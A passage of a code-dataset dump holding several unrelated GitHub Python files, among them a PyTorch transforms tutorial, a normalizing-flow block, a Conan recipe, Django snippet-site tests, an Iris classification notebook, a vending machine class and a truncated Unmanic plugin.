'w')\nfor i in range (len(names)):\n\tfor j in range (i+1,len(names)):\n\t\tfo.write(\"{}\\t{}\\t{:.4f}\\n\".format(names[i],names[j],1-dd[c]))\n\t\tc += 1\n\n\nfo.close()\n","repo_name":"networkbiolab/Network-Filtering","sub_path":"Analysis/docornet.py","file_name":"docornet.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"71823688717","text":"# about transforms to datasets\n# if use builtin dataset, can pass in transform argument\n# pytorch has a lot of transforms already implemented\n# can see at https://pytorch.org/vision/stable/transforms.html\n# ex. 
transforms that can be applied to images or tensors, ones \n# that do conversions, generic transforms, etc.\n# can also compose a list of transforms to do multiple transforms in a row\n\nimport torch\nimport torchvision\nfrom torch.utils.data import Dataset, DataLoader\nimport numpy as np\nimport math\n\n\n# extending WineDataset class to support transforms\nclass WineDataset(Dataset):\n\n # add optional transform parameter whose default is None\n def __init__(self, transform=None):\n xy = np.loadtxt('wine.csv', delimiter=',', dtype=np.float32, skiprows=1)\n \n # note that we do not convert to a tensor here\n self.x = xy[:, 1:]\n self.y = xy[:, [0]]\n self.n_samples = xy.shape[0]\n\n # add self.transform\n self.transform = transform\n \n def __getitem__(self, index):\n # apply transform if it's available\n sample = self.x[index], self.y[index]\n\n # if self.transform != None, then transform the sample\n if self.transform:\n sample = self.transform(sample)\n \n return sample\n \n def __len__(self):\n return self.n_samples\n\n\n# create custom transform classes\n# write our own ToTensor class\nclass ToTensor:\n # makes it a callable object, so can call ToTensor()\n def __call__(self, sample):\n # first unpack samples\n inputs, targets = sample\n # returns a tuple\n return torch.from_numpy(inputs), torch.from_numpy(targets)\n\n \ndataset = WineDataset(transform=ToTensor())\nfirst_data = dataset[0]\nfeatures, labels = first_data\nprint(features)\nprint(type(features), type(labels))\n# ^see that features and labels are now of type tensor,\n# whereas if we pass None as the transform argument they\n# are of type numpy.ndarray\n\n# make a multiplication transform\nclass MultiplicationTransform:\n def __init__(self, factor):\n self.factor = factor\n\n def __call__(self, sample):\n inputs, target = sample\n inputs *= self.factor\n return inputs, target # as tuple\n\n# apply multiplication transform using a composed transform\n# Compose takes a list of transforms\ncomposed = torchvision.transforms.Compose([ToTensor(), MultiplicationTransform(4)])\ndataset = WineDataset(transform=composed)\nfirst_data = dataset[0]\nfeatures, labels = first_data\nprint(features)\nprint(type(features), type(labels))\n# ^here see that each item got multiplied by the\n# factor passed into the multiplication transform","repo_name":"chana-kaminsky/pytorch_tutorial","sub_path":"10 - Dataset Transforms.py","file_name":"10 - Dataset Transforms.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38073776437","text":"import FrEIA.framework as Ff\nimport FrEIA.modules as Fm\nimport FrEIA as Fr\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom typing import Callable\nfrom scipy.stats import special_ortho_group\nfrom attn_modules.magicAttn_step import MagicISDP\nimport wandb\n\nclass MagicAttnBlock(Fm.AllInOneBlock): \n def __init__(self, dims_in, dims_c=[],\n subnet_constructor: Callable = None,\n affine_clamping: float = 2.,\n gin_block: bool = False,\n global_affine_init: float = 1.,\n global_affine_type: str = 'SOFTPLUS',\n permute_soft: bool = False,\n learned_householder_permutation: int = 0,\n reverse_permutation: bool = False,\n cfg = None,\n split_dim=1,\n n_head=1, is_multiHead=False):\n \n super(MagicAttnBlock, self).__init__(dims_in, dims_c, subnet_constructor)\n \n self.cfg = cfg\n self.MagicISDP = MagicISDP(dims_in[0][0], split_dim, n_head, is_multiHead, cfg)\n \n if self.cfg 
!= None and self.cfg.use_wandb:\n wandb.init(project=self.cfg.wandb_project, name=self.cfg.wandb_table)\n\n\n def forward(self, x, c=[], rev=False, jac=True):\n '''See base class docstring'''\n #import pdb; pdb.set_trace()\n if self.householder:\n self.w_perm = self._construct_householder_permutation()\n if rev or self.reverse_pre_permute:\n self.w_perm_inv = self.w_perm.transpose(0, 1).contiguous()\n\n if rev:\n x, global_scaling_jac = self._permute(x[0], rev=True)\n x = (x,)\n elif self.reverse_pre_permute:\n x = (self._pre_permute(x[0], rev=False),)\n\n x1, x2 = torch.split(x[0], self.splits, dim=1)\n\n if self.conditional:\n x1c = torch.cat([x1, *c], 1)\n else:\n x1c = x1\n \n if not rev:\n a1 = self.subnet(x1c)\n x2, j2 = self._affine(x2, a1)\n else:\n a1 = self.subnet(x1c)\n x2, j2 = self._affine(x2, a1, rev=True)\n\n log_jac_det = j2\n x_out = torch.cat((x1, x2), 1)\n\n\n \"\"\"\n After the coupling block, apply MagicISDP\n \"\"\"\n if not rev:\n x_out, log_jac_det = self.MagicISDP(x_out, logdet=log_jac_det, reverse=False, permute=False)\n else:\n x_out, log_jac_det = self.MagicISDP(x_out, logdet=log_jac_det, reverse=True, permute=False)\n \n\n if not rev:\n x_out, global_scaling_jac = self._permute(x_out, rev=False)\n elif self.reverse_pre_permute:\n x_out = self._pre_permute(x_out, rev=True)\n\n \n # add the global scaling Jacobian to the total.\n # trick to get the total number of non-channel dimensions:\n # number of elements of the first channel of the first batch member\n n_pixels = x_out[0, :1].numel()\n log_jac_det += (-1)**rev * n_pixels * global_scaling_jac\n\n\n if self.cfg != None and self.cfg.use_wandb:\n wandb.log({'global_scale_logdet': torch.mean(global_scaling_jac), 'FlowStep_logdet': torch.mean(log_jac_det)})\n \n\n return (x_out,), log_jac_det\n\n# Flow level : [squeeze - actnorm - invertible 1x1 - affine coupling - invertible attention - split - squeeze]","repo_name":"dewyeon/toy2d","sub_path":"attn_modules/magicAttnBlock.py","file_name":"magicAttnBlock.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"29"} +{"seq_id":"42458680963","text":"# Write a program that finds the product of each pair of numbers in a list.\n# A pair is the first and last element, the second and the second-to-last, and so on.\n# Example:\n# - [2, 3, 4, 5, 6] => [12, 15, 16];\n# - [2, 3, 5, 6] => [12, 15]\n\nfrom random import randint\n\n\nnumber = int(input('Введите количество элементов списка: '))\n\n\ndef create_rand_list(n):\n list_of_elements = []\n for i in range(n):\n list_of_elements.append(randint(0, 10))\n return list_of_elements\n\n\nlist_of_nums = create_rand_list(number)\nprint(list_of_nums)\n\n\ndef prod_of_pairs(list):\n list_of_prods = []\n for i in range((len(list)+1)//2):\n prod = list[i]*list[-1-i]\n list_of_prods.append(prod)\n # print (f'{list [i]}*{list[-1-i]} = {prod}')\n return list_of_prods\n\n\nresult_list = prod_of_pairs(list_of_nums)\nprint(result_list)\n","repo_name":"UlyanaN/Seminar_02.09.2022_Python","sub_path":"Homework_3/Task_02.py","file_name":"Task_02.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"35581066338","text":"from conans import ConanFile, CMake\nfrom conans.tools import download, unzip\nimport os\n\nclass FclConan(ConanFile):\n name = \"fcl\"\n version = \"0.3\"\n settings = \"os\", \"compiler\", \"build_type\", \"arch\"\n options = {\"shared\": [True, False]}\n 
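# build the shared library by default; the static variant stays selectable through options\n    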
default_options = \"shared=True\"\n requires = \"libccd/2.0@jslee02/stable\", \"Boost/1.59.0@lasote/stable\"\n exports = \"fcl/*\"\n url=\"https://github.com/jslee02/conan-dart/tree/master/fcl/0.3\"\n\n def source(self):\n zip_name = \"fcl-0.3.2.zip\"\n download(\"https://github.com/flexible-collision-library/fcl/archive/0.3.2.zip\", zip_name)\n unzip(zip_name)\n os.unlink(zip_name)\n\n def build(self):\n cmake = CMake(self.settings)\n shared = \"-DBUILD_SHARED_LIBS=1\" if self.options.shared else \"\"\n self.run(\"cd fcl-0.3.2 && cmake . %s %s\" % (cmake.command_line, shared))\n self.run(\"cd fcl-0.3.2 && cmake --build . %s\" % cmake.build_config)\n\n def package(self):\n # include\n self.copy(\"*.h\", dst=\"include\", src=\"fcl-0.3.2/include\")\n self.copy(\"*.hxx\", dst=\"include\", src=\"fcl-0.3.2/include\")\n \n # lib\n self.copy(\"*.dll\", dst=\"bin\", src=\"fcl-0.3.2/lib\")\n self.copy(\"*.lib\", dst=\"lib\", src=\"fcl-0.3.2/lib\")\n self.copy(\"*.a\", dst=\"lib\", src=\"fcl-0.3.2/lib\")\n self.copy(\"*.so*\", dst=\"lib\", src=\"fcl-0.3.2/lib\")\n self.copy(\"*.dylib*\", dst=\"lib\", src=\"fcl-0.3.2/lib\")\n\n def package_info(self):\n self.cpp_info.libs = [\"fcl\"]\n\n","repo_name":"jslee02/conan-dart","sub_path":"fcl/0.3/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"2139895559","text":"# -*- coding: utf-8 -*-\n\"\"\"Functional tests\"\"\"\n\nfrom django.test import TestCase\nfrom django.test.client import Client\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.models import User\n\nfrom snippify.accounts.models import UserProfile\nfrom django_emailqueue.models import EmailQueue\n\nfrom models import Snippet, SnippetComment\n\nimport json\n\nclass SnippetsTestCase(TestCase):\n def setUp(self):\n \"\"\" Create a user, a superuser and a few snippets \"\"\"\n self.user = User.objects.create_user('user', 'user@email.com',\n 'password')\n user_profile = UserProfile(user=self.user, restkey='key')\n user_profile.save()\n\n self.superuser = User.objects.create_superuser('superuser',\n 'superuser@email.com',\n 'password')\n\n self.client.login(username='user', password='password')\n\n self.snippet_text = Snippet.objects.create(\n author=self.user,\n title=\"Text file\",\n description=\"Text file for testing\",\n lexer=\"txt\",\n body=\"\"\"This is a text snippet\n this is is the second line\n \"\"\"\n )\n\n self.snippet_python = Snippet.objects.create(\n author=self.user,\n title=\"Python snippet\",\n description=\"Python snippet for testing\",\n lexer=\"python\",\n body=\"\"\"Snippet body\"\"\",\n )\n self.snippet_python.tags.add(\"python\", \"code\")\n\nclass SnippetsViewsTests(SnippetsTestCase):\n \"\"\" Snippets views tests \"\"\"\n\n def test_add_snippet(self):\n \"\"\"Using the snippets_create view add a snippet\"\"\"\n response = self.client.get(reverse('snippets_create'))\n self.assertEqual(response.status_code, 200)\n\n data = {\n 'title': 'Snippet 3',\n 'description': 'Snippet 3 4',\n 'body': \"\"\"#!/usr/bin/python\nx=3\n\"\"\",\n 'tags': 'python test-tag'\n }\n\n #First one is search\n response = self.client.post(reverse('snippets_create'), data)\n\n self.assertEqual(response.status_code, 302)\n snippet = Snippet.objects.get(title=\"Snippet 3\")\n #Pygments guessed the correct lexer\n self.assertEqual('Snippet 3', str(snippet))\n for field, value in data.items():\n if field == 'tags':\n self.assertEqual([t.name for 
t in snippet.tags.all()],\n data['tags'].split(\" \"))\n else:\n self.assertEqual(getattr(snippet, field), value)\n\n def test_update_snippet(self):\n \"\"\" \"\"\"\n title_text = \"Updated title\"\n response = self.client.post(\n reverse('snippets_update', None, [self.snippet_text.pk]), {\n \"title\": title_text,\n \"description\": self.snippet_text.description,\n \"body\": self.snippet_text.body,\n 'status': 'published',\n 'privacy': 'public',\n })\n self.assertEqual(response.status_code, 302)\n updated_snippet = Snippet.objects.get(pk=self.snippet_text.pk)\n self.assertEqual(updated_snippet.title, title_text)\n\n def test_create_admin(self):\n \"\"\" Add a snippet from administration section \"\"\"\n title = 'a snippet'\n body = 'body'\n self.client.login(username='superuser', password='password')\n self.client.post('/admin/snippets/snippet/add/',\n {'title': title, 'body': body})\n snippet = Snippet.objects.get(title=title)\n self.assertEqual(snippet.body, body)\n\n def test_update_notification(self):\n \"\"\" Create a user and then make him follow another user.\n Update an existing snippet and check if the notification was sent. \"\"\"\n\n def test_preview_snippet(self):\n \"\"\" When the user click the preview button an ajax request will be called\n which returns a html content of the snippet\"\"\"\n\n response = self.client.post(\n reverse('snippets_preview', None, []), {\n \"body\": self.snippet_text.body,\n 'lexer': u'text',\n 'style': u'friendly',\n })\n self.assertEqual(response.status_code, 200)\n self.assertTrue('This is a text snippet' in response.content)\n\n def test_search(self):\n \"\"\" Test the search results \"\"\"\n\n def test_suggest(self):\n \"\"\"Test autosuggest (used in firefox search plugin and google chrome)\"\"\"\n\n def test_download(self):\n \"\"\"Downloading snippet\"\"\"\n\n def test_delete(self):\n \"\"\"Make sure it redirects properly\"\"\"\n\nclass VersioningTestCase(SnippetsTestCase):\n \"\"\" Versioning of snippets support. 
Check if diff works properly \"\"\"\n\n def test_create(self):\n \"\"\" Update a snippet and check if the version is there\"\"\"\n\n def test_view(self):\n \"\"\" View a specific version \"\"\"\n\n def test_diff(self):\n \"\"\" Update the same snippet the second time and check the diff\n output\"\"\"\n\nclass CommentsTestCase(SnippetsTestCase):\n \"\"\" Testing comments functionality \"\"\"\n\n def test_create(self):\n \"\"\" Comment on a specific snippet \"\"\"\n\n body = u'this is a comment'\n response = self.client.post(reverse('snippets_comment', None, [1]), {\n 'body': body\n })\n self.assertEqual(SnippetComment.objects.get(snippet=1).body, body)\n self.assertTrue(body in json.loads(response.content)['content'])\n\n def test_create_no_body(self):\n \"\"\" \"\"\"\n response = self.client.post(reverse('snippets_comment', None, [1]))\n self.assertEqual(len(SnippetComment.objects.all()), 0)\n self.assertTrue('Body field is required' in response.content)\n\n def test_create_notification(self):\n \"\"\" If a user comments on another user's snippets then a notification\n should be sent.\n\n \"\"\"\n self.client.login(username='superuser', password='password')\n self.test_create()\n self.assertEqual(len(EmailQueue.objects.all()), 1)\n\n def test_create_no_anonymous(self):\n \"\"\" Anonymous users can't post comments \"\"\"\n\n self.client.logout()\n response = self.client.post(reverse('snippets_comment', None, [1],),\n {'body': 'a body'})\n self.assertEqual(len(SnippetComment.objects.all()), 0)\n self.assertEqual(u'You must login to post a comment',\n json.loads(response.content)['error'])\n\n def test_delete(self):\n \"\"\" Administrators should be able to delete comments \"\"\"\n self.test_create()\n self.client.login(username='superuser', password='password')\n response = self.client.get(reverse('snippets_comment',\n args=[1],) + '?delete=1', follow=True)\n self.assertEqual(len(SnippetComment.objects.all()), 0)\n self.assertTrue('Comment deleted succesfully' in response.content)\n\n def test_delete_fail(self):\n \"\"\" Users should NOT be able to delete comments \"\"\"\n self.test_create()\n response = self.client.get(reverse('snippets_comment',\n args=[1],) + '?delete=1', follow=True)\n self.assertEqual(len(SnippetComment.objects.all()), 1)\n self.assertTrue('Permission denied' in response.content)\n\n\nclass TagTests(SnippetsTestCase):\n \"\"\"Test tag views\"\"\"\n\n def test_tags_index(self):\n \"\"\"All the tags\"\"\"\n\n def test_tag(self):\n \"\"\"All the snippets in one tag\"\"\"\n\n def test_tag_user(self):\n \"\"\"All user's snippets tagged with a specific tag\"\"\"\n\nclass ApiTests(SnippetsTestCase):\n\n def test_create(self):\n \"\"\"\" \"\"\"\n","repo_name":"xarg/snippify","sub_path":"snippets/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":7742,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"29"} +{"seq_id":"28592648165","text":"\n# coding: utf-8\n\n# Machine learning project\n\n# Project Instructions:\n# You can start with the classification project if it helps you. It is the file Classification.ipynb.\n# During the classification lecture we did not talk about certain modeling practices that we used in the two auto case studies and that was intentional so that you can apply them in your IRIS Project. Your assignment is as follows....\n# 1)Scale your independent variables (the x variables) and explain why we typically scale the variables. 
(20 points) [approach used below: normalizing the data]\n# 2)Produce a cross validation score with K=5 for the decision tree model like we did in the auto case studies and explain why we typically use cross validation in modeling (20 points)\n# 3)Produce a confusion matrix for the decision tree model and explain what you conclude from the confusion matrix (20 points)\n# 4)Produce a confusion matrix for the random forest model and explain what you conclude from the confusion matrix (20 points) \n# 5)This is the hardest part of the project because we did not go over the k selection but there is plenty of literature on the internet. In the classification lecture we used k-nearest neighbors and we selected k=5. However, it may not be the optimum k value. Write a program that selects the optimum K for the K Neighbors Classifier model. (20 points)\n# What I am looking for is the python code and the output of the code.\n# A lot of what I am asking we already covered in the last two lectures; feel free to utilize the code from the case studies. \n# We will go over the solution in the next lecture.\n# IRIS data set is the most commonly used data set in modeling, which is why it comes with the sklearn package. I recommend you become familiar with it as a lot of interview questions are based on modeling the IRIS data set.\n# Regards,\n# DP\n\n# # Import libraries and data\n\n# In[1]:\n\n\n#Importing the packages \nimport pandas as pd\nfrom sklearn.datasets import load_iris\nfrom sklearn import datasets\nimport numpy as np\nfrom sklearn.model_selection import KFold,StratifiedKFold  # sklearn.cross_validation was removed; use model_selection\nfrom sklearn import preprocessing\nfrom sklearn.preprocessing import StandardScaler,OneHotEncoder,LabelEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\n\n\nimport matplotlib.pyplot as plt\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# # 1. Scale Iris Data (using Normalization)\n# - Data can be scaled or preprocessed in 2 ways. Normalization scales the data by putting it in the range between 0 and 1. Standardization creates a distribution out of the data with mean 0 and unit variance. Normalization is good for Iris as it works better with k-nearest neighbors and regression coefficients. This is why I have chosen to normalize this data set. (Note: sklearn's preprocessing.normalize used below actually rescales each sample to unit norm rather than mapping each feature into [0, 1]; MinMaxScaler is the transformer that does the latter.)\n\n# In[2]:\n\n\n#loading and scaling iris data set\niris = datasets.load_iris() \nirisX = iris.data[:,:4] #independent var X\nirisY = iris.target #target var Y\n\n#print(irisX)\n\nirisX = preprocessing.normalize(irisX) # sklearn.preprocessing\n#print(irisX)\ndata = iris['data']\nirisDataFrame = pd.DataFrame(data)\nfeatures = iris['feature_names']\nheader = ['Sepal Length (cm)', 'Sepal width (cm)', 'Petal length (cm)', 'Petal Width(cm)']\nirisDataFrame.columns = header\nirisDataFrame['Target'] = target = irisY\ntargetNames = list(iris.target_names)\nlst = [targetNames[i].title() for i in irisDataFrame['Target'] ]\nirisDataFrame['Target Name'] = lst\n\n\n# # Logistic Regression Model\n\n# In[3]:\n\n\n# C specifies the inverse of regularization strength. 
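(A brief aside, not from the original notebook: the snippet below illustrates the comment about `C` in `LogisticRegression`. The loop values are invented for demonstration; smaller `C` means stronger L2 regularization, which shrinks the fitted coefficients.)

```python
# Hedged sketch: watch the mean absolute coefficient shrink as C decreases.
from sklearn.datasets import load_iris
from sklearn.linear_model import LogisticRegression

X, y = load_iris(return_X_y=True)
for C in (0.01, 1.0, 100.0):
    clf = LogisticRegression(C=C, max_iter=1000).fit(X, y)
    print(C, abs(clf.coef_).mean())
```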
The smaller the value, the stronger the regularization.\n# Fitting with a Logistic Regression model\niris_logr = LogisticRegression(C=1e4)\niris_logr.fit(irisX, irisY)\nsetosa_coeff, versicolor_coeff, virginica_coeff = iris_logr.coef_\nsetosa_interc, versicolor_interc, virginica_interc = iris_logr.intercept_\n\n# Observe the coefficients of the predictors\nprint(\"Coefficients of setosa, versicolor, virginica: %s\" %str(iris_logr.coef_))\n\n#Observe the intercept\nprint(\"Intercept: %s\" %iris_logr.intercept_)\n\n#Model Score\n## .score returns mean accuracy for classifiers\nprint(\"The mean accuracy for the multi-class logistic regression model is: %.4f\" %iris_logr.score(irisX, irisY))\n\n\n# In[4]:\n\n\nfrom sklearn.tree import DecisionTreeClassifier\niris_dtree = DecisionTreeClassifier()\niris_dtree.fit(irisX,irisY)\n#Model Score\n## .score returns mean accuracy for classifiers\nprint(\"The mean accuracy for the Decision Tree model is: %.4f\" %iris_dtree.score(irisX, irisY))\n\n\n# # Random Forest Classifier \n\n# In[5]:\n\n\nfrom sklearn.ensemble import RandomForestClassifier\n\niris_rf = RandomForestClassifier(random_state=1)\niris_rf.fit(irisX,irisY)\n#Model Score\nprint(\"The mean accuracy for the Random Forest model is: %.4f\" %iris_rf.score(irisX, irisY))\n\n\n# # K- Fold Cross Validation\n\n# In[6]:\n\n\nfrom sklearn.model_selection import KFold\nfrom sklearn.metrics import confusion_matrix\n\nx = irisX\ny = irisY\nkf = KFold(n_splits=5, random_state=None, shuffle=True)\nkf.get_n_splits(x)\nfor train_i, test_i in kf.split(x):\n    print(\"TRAIN:\", train_i, \"TEST:\", test_i)\n    X_train, X_test = x[train_i], x[test_i]\n    y_train, y_test = y[train_i], y[test_i]\n\n\n# # 2. KFold Score\n# We use cross validation to get a better estimate of the test error and so gauge the accuracy of our model. It is preferred over a single held-out validation set because it does not shrink the training data as much, which would otherwise increase error.\n\n# In[7]:\n\n\n#K- Fold Score\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn import metrics\n\niris_dtree.fit(X_train, y_train)\ny_pred = cross_val_predict(iris_dtree,irisX,irisY,cv=5)\naccuracies_cv_new = cross_val_score(iris_dtree, X_train, y_train, cv=5)\nprint('The 5-fold cross validation accuracy of this model is: %s' % '{0:.3%}'.format(accuracies_cv_new.mean()))\nprint('The accuracy of this model is: %s' % '{0:.3%}'.format(metrics.accuracy_score(irisY,y_pred)))\n\n\n# # 3. Confusion Matrix for Decision Tree\n# This is the confusion matrix to gauge the error rate. (code copied from lectures)\n\n# In[11]:\n\n\n#Confusion Matrix,\nfrom sklearn.metrics import classification_report,confusion_matrix,auc,accuracy_score\nfrom mlxtend.plotting import plot_confusion_matrix \nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn.metrics import confusion_matrix\n\n\ny_pred = cross_val_predict(iris_dtree,irisX,irisY,cv=5)\ncm = confusion_matrix(irisY,y_pred)\nfig = plot_confusion_matrix(conf_mat=cm,figsize=(4,4),cmap=plt.cm.Reds,hide_spines=True)\nplt.title('Confusion Matrix',fontsize=14)\nplt.xlabel('Predicted Values')\nplt.ylabel('Actual Values')\n# Turn the axis grid off\nplt.grid(False)\n\n# Print out metrics\nprint('The 5-fold cross validation accuracy of this model is: %s' % '{0:.3%}'.format(accuracies_cv_new.mean()))\nprint('The accuracy of this model is: %s' % '{0:.3%}'.format(accuracy_score(irisY,y_pred)))\n\n\n# The matrix shows us that the decision tree is a very good predictor for the Iris set. 
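(As a supplement, not from the original notebook: the matrix can also be read numerically. The sketch below derives per-class precision and recall from any square confusion matrix; `cm_demo` is a made-up matrix with the same 3x3 shape as the Iris one.)

```python
# Hedged sketch: per-class precision and recall from a confusion matrix
# whose rows are actual classes and columns are predicted classes
# (the sklearn convention used above).
import numpy as np

def per_class_metrics(cm):
    cm = np.asarray(cm, dtype=float)
    precision = np.diag(cm) / cm.sum(axis=0)  # column sums = predicted counts
    recall = np.diag(cm) / cm.sum(axis=1)     # row sums = actual counts
    return precision, recall

cm_demo = np.array([[50, 0, 0], [0, 47, 3], [0, 3, 47]])
print(per_class_metrics(cm_demo))
```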
This is apparent from the heavy principal diagonal and 6/150 classification error.\n\n# # 4. Confusion Matrix for Random Forest\n# This is the confusion matrix to gauge the error rate. (code copied from lectures)\n\n# In[9]:\n\n\n#K- Fold Score Random Forest Model\niris_rf.fit(X_train, y_train)\n\n\ny_pred_rf = cross_val_predict(iris_rf,irisX,irisY,cv=5)\nconf_mat_rf = confusion_matrix(irisY,y_pred_rf)\naccuracies_cv_new = cross_val_score(iris_rf, X_train, y_train, cv=5)\n\n\nfig = plot_confusion_matrix(conf_mat=conf_mat_rf,figsize=(4,4),cmap=plt.cm.Reds,hide_spines=True)\nplt.title('Confusion Matrix',fontsize=14)\nplt.xlabel('Predicted Values')\nplt.ylabel('Actual Values')\n# Turn the axis grid off\nplt.grid(False)\n\n# Print out metrics\nprint('The 5-fold cross validation accuracy of this model is: %s' % '{0:.3%}'.format(accuracies_cv_new.mean()))\nprint('The accuracy of this model is: %s' % '{0:.3%}'.format(accuracy_score(irisY,y_pred_rf)))\n\n\n# The matrix shows us that the random forest is a very good predictor for the Iris set. This is apparent from the heavy principal diagonal and 4/150 classification error.\n\n# One thing to note is that while both are very good models (as shown by their accuracy and confusion matrices), the Decision Tree has a slightly lower KFold score and more errors in the confusion matrix. Despite this, decision trees suit the iris data set better.\n\n# # 5. Optimum K for K Neighbors model\n# The best K values were ascertained by looking at the highest 10-Fold cross validation accuracy of K-neighbor models with K ranging from 1 to 50.\n\n# In[10]:\n\n\nfrom sklearn.neighbors import KNeighborsClassifier \n\ndef KFoldScore():\n    KScore = []\n    for i in range(1, 51): \n        KNeighbors = KNeighborsClassifier(n_neighbors=i)\n        KNeighbors.fit(X_train, y_train)\n        #from lecture\n        accuracies_cv_new = cross_val_score(KNeighbors, X_train, y_train, cv=10)\n        kscore = accuracies_cv_new.mean()\n        KScore.append(kscore)\n    return (KScore)\n\ndef getMax():\n    KScores = KFoldScore()\n    maxKScore = max(KScores)\n    bestK = []\n    for i in range(1, 51):\n        if (KScores[i-1] == maxKScore):\n            bestK.append(i)\n    return (bestK, maxKScore)\n\n#print(KFoldScore())\n#print(getMax())\n\nkresult = getMax()\nprint(\"The best K values <= 50 are the following (score =\", kresult[1],\"):\", end=\" \")\nfor i in kresult[0]:\n    print(i, end=\",\")\n\n\n","repo_name":"das800/MachineLearningProject","sub_path":"iris.py","file_name":"iris.py","file_ext":"py","file_size_in_byte":9345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"6934180418","text":"class Solution:\n    def permute(self, nums: List[int]) -> List[List[int]]:\n        \"\"\"\n        :type nums: List[int]\n        :rtype: List[List[int]]\n        \"\"\"\n        global resultList,path\n        resultList = []\n        path =[]\n        def dfsSub(nums):\n            global path,resultList\n            if len(path) >= len(nums):\n                resultList.append(path)\n                return\n            for i in range(len(nums)):\n                if nums[i] not in path:\n                    path = path + [nums[i]]\n                else:\n                    continue\n                dfsSub(nums)\n                path = path[:-1]\n            return resultList\n        dfsSub(nums)\n        return resultList","repo_name":"saintifly/leetcode","sub_path":"没有重复元素集合的全排列.py","file_name":"没有重复元素集合的全排列.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"34610003312","text":"import numpy as np \nimport matplotlib.pyplot as plt \n\npeaks = np.abs(np.load('peaks.npy'))\nMasses = np.load('Masses.npy')\ntimes = np.load(\"times.npy\")\npeak_idx = 
np.argmax(peaks)  # renamed from `max` so the builtin is not shadowed\nprint(Masses[peak_idx])\nprint(peak_idx)\nn, bins, patches = plt.hist(times, 10, density=False, facecolor='g', alpha=0.75)\nplt.xlabel('GPS Times')\nplt.ylabel('#')\nplt.title('Histogram of times for SNR peaks')\nplt.show()","repo_name":"francesco-vaselli/itb_problem","sub_path":"checks.py","file_name":"checks.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"29397961625","text":"import drink\n\nclass VendingMachine:\n    def __init__(self):\n        self.drink_pepsi = [drink.Drink(\"pepsi\", 150) for _ in range(5)]\n        self.drink_monster = [drink.Drink(\"monster\", 150) for _ in range(5)]\n        self.drink_irohasu = [drink.Drink(\"irohasu\", 150) for _ in range(5)]\n        self.drink_all = [self.drink_pepsi, self.drink_monster, self.drink_irohasu]\n        self.__sales = 0\n\n    @property\n    def sales(self):\n        return self.__sales\n    \n    @sales.setter\n    def sales(self, value):\n        self.__sales = value\n\n    def target_drink(self, drink: object):\n        for i in self.drink_all:\n            if i[0].name == drink.name:\n                target_drink = i\n        \n        return target_drink\n\n    def buy(self, drink: object, num, suica: object):\n        # Validate before mutating any state, so a failed purchase leaves\n        # stock and balance untouched (the original used a bare `raise`,\n        # which is a RuntimeError outside an except block).\n        if len(self.target_drink(drink)) < num:\n            raise ValueError(\"not enough stock\")\n\n        total = int(drink.price) * num\n        if suica.balance < total:\n            raise ValueError(\"insufficient balance\")\n\n        for _ in range(num):\n            self.target_drink(drink).pop()\n\n        self.__sales += total\n        suica.balance -= total\n\n    def available_list(self, suica: object):\n        available_list = []\n        for drink in self.drink_all:\n            if (suica.balance >= drink[0].price) \\\n                and (len(drink) > 0):\n                available_list.append(drink[0].name)\n        \n        return available_list\n    \n    def stock(self):\n        stock_list = []\n        for drink in self.drink_all:\n            drink_list = f\"({drink[0].name}:{len(drink)})\"\n            stock_list.append(drink_list)\n        \n        return stock_list\n    \n    def add_stock(self, drink: object, num):\n        for _ in range(num):\n            self.target_drink(drink).append(drink)\n","repo_name":"sousou1216/hc_practice","sub_path":"python/vending_machine/vending_machine.py","file_name":"vending_machine.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"33658445327","text":"import json\nimport logging\nimport jsonata\n\nfrom unmanic.libs.unplugins.settings import PluginSettings\n\nfrom limit_library_search_by_ffprobe_data.lib.ffmpeg import Probe\n\n# Configure plugin logger\nlogger = logging.getLogger(\"Unmanic.Plugin.limit_library_search_by_ffprobe_data\")\n\n\nclass Settings(PluginSettings):\n    settings = {\n        \"stream_field\": '',\n        \"allowed_values\": '',\n        \"add_all_matching_values\": False,\n    }\n    form_settings = {\n        \"stream_field\": {\n            \"label\": \"The FFprobe field to match against\",\n            \"description\": \"A JSONata query selecting the FFprobe field to match against the search strings below.\"\n        },\n        \"allowed_values\": {\n            \"label\": \"Search strings\",\n            \"description\": \"A comma separated list of strings to match against the JSONata query results.\"\n        },\n        \"add_all_matching_values\": {\n            \"label\": \"Add all matching files to pending tasks list\",\n            \"description\": \"If this option is enabled and the file matches one of the specified values,\\n\"\n                           \"this plugin will add the file to Unmanic's pending task list straight away\\n\"\n                           \"without executing any subsequent file test plugins.\",\n        }\n    }\n\n    def __init__(self, *args, **kwargs):\n        super(Settings, self).__init__(*args, **kwargs)\n\n\ndef file_ends_in_allowed_values(probe_info, stream_field, 
